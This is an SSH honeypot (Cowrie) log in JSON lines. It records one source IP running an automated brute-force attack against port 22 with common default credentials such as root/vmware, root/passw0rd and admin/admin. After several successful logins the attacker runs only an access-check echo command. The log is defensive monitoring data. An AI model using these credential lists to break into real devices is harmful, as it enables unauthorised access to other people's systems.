{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:51.850931Z","src_ip":"212.227.125.160","session":"652874415dad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:51.880979Z","src_ip":"212.227.125.160","session":"652874415dad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:52.076470Z","src_ip":"212.227.125.160","session":"652874415dad"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:53.121445Z","src_ip":"212.227.125.160","session":"652874415dad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58418,"dst_ip":"1.2.3.4","dst_port":22,"session":"16c0c6b4155c","protocol":"ssh","message":"New connection: 212.227.125.160:58418 (1.2.3.4:22) [session: 16c0c6b4155c]","sensor":"my-vps","timestamp":"2025-09-09T02:56:53.167938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:53.168590Z","src_ip":"212.227.125.160","session":"16c0c6b4155c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:53.235107Z","src_ip":"212.227.125.160","session":"16c0c6b4155c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:53.398083Z","src_ip":"212.227.125.160","session":"16c0c6b4155c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:54.446924Z","src_ip":"212.227.125.160","session":"16c0c6b4155c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39336,"dst_ip":"1.2.3.4","dst_port":22,"session":"d63cf7dcedf0","protocol":"ssh","message":"New connection: 212.227.125.160:39336 (1.2.3.4:22) [session: d63cf7dcedf0]","sensor":"my-vps","timestamp":"2025-09-09T02:56:54.488198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:54.488924Z","src_ip":"212.227.125.160","session":"d63cf7dcedf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:54.536293Z","src_ip":"212.227.125.160","session":"d63cf7dcedf0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:54.888938Z","src_ip":"212.227.125.160","session":"d63cf7dcedf0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:55.934331Z","src_ip":"212.227.125.160","session":"d63cf7dcedf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48692,"dst_ip":"1.2.3.4","dst_port":22,"session":"0745ad093de3","protocol":"ssh","message":"New connection: 212.227.125.160:48692 (1.2.3.4:22) [session: 0745ad093de3]","sensor":"my-vps","timestamp":"2025-09-09T02:56:55.976035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:55.976655Z","src_ip":"212.227.125.160","session":"0745ad093de3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:56.093702Z","src_ip":"212.227.125.160","session":"0745ad093de3"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:56.339301Z","src_ip":"212.227.125.160","session":"0745ad093de3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:57.386055Z","src_ip":"212.227.125.160","session":"0745ad093de3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57324,"dst_ip":"1.2.3.4","dst_port":22,"session":"571f9dd68ed9","protocol":"ssh","message":"New connection: 212.227.125.160:57324 (1.2.3.4:22) [session: 571f9dd68ed9]","sensor":"my-vps","timestamp":"2025-09-09T02:56:57.429313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:57.430170Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:57.474909Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.login.success","username":"root","password":"vmware","message":"login attempt [root/vmware] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:56:57.942262Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:56:58.135350Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.136005Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.217049Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.218131Z","src_ip":"212.227.125.160","session":"571f9dd68ed9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33618,"dst_ip":"1.2.3.4","dst_port":22,"session":"d52989b9c55c","protocol":"ssh","message":"New connection: 212.227.125.160:33618 (1.2.3.4:22) [session: d52989b9c55c]","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.284096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.329174Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.353163Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.578455Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:56:58.788871Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.789519Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.931490Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.932523Z","src_ip":"212.227.125.160","session":"d52989b9c55c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37786,"dst_ip":"1.2.3.4","dst_port":22,"session":"7907f23382a8","protocol":"ssh","message":"New connection: 212.227.125.160:37786 (1.2.3.4:22) [session: 7907f23382a8]","sensor":"my-vps","timestamp":"2025-09-09T02:56:58.982479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:59.007234Z","src_ip":"212.227.125.160","session":"7907f23382a8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:59.051052Z","src_ip":"212.227.125.160","session":"7907f23382a8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"passw0rd","message":"login attempt [admin/passw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:59.390059Z","src_ip":"212.227.125.160","session":"7907f23382a8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:00.683636Z","src_ip":"212.227.125.160","session":"7907f23382a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46238,"dst_ip":"1.2.3.4","dst_port":22,"session":"af9e6a3b9ef6","protocol":"ssh","message":"New connection: 212.227.125.160:46238 (1.2.3.4:22) [session: af9e6a3b9ef6]","sensor":"my-vps","timestamp":"2025-09-09T02:57:00.742242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:00.994995Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:00.996315Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.login.success","username":"root","password":"default","message":"login attempt [root/default] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:02.265284Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:03.001156Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:03.001911Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:03.635712Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:03.636878Z","src_ip":"212.227.125.160","session":"af9e6a3b9ef6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57328,"dst_ip":"1.2.3.4","dst_port":22,"session":"d370e7343795","protocol":"ssh","message":"New connection: 212.227.125.160:57328 (1.2.3.4:22) [session: d370e7343795]","sensor":"my-vps","timestamp":"2025-09-09T02:57:03.680433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:03.920151Z","src_ip":"212.227.125.160","session":"d370e7343795"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:03.920802Z","src_ip":"212.227.125.160","session":"d370e7343795"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:04.850608Z","src_ip":"212.227.125.160","session":"d370e7343795"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:06.645606Z","src_ip":"212.227.125.160","session":"d370e7343795"}
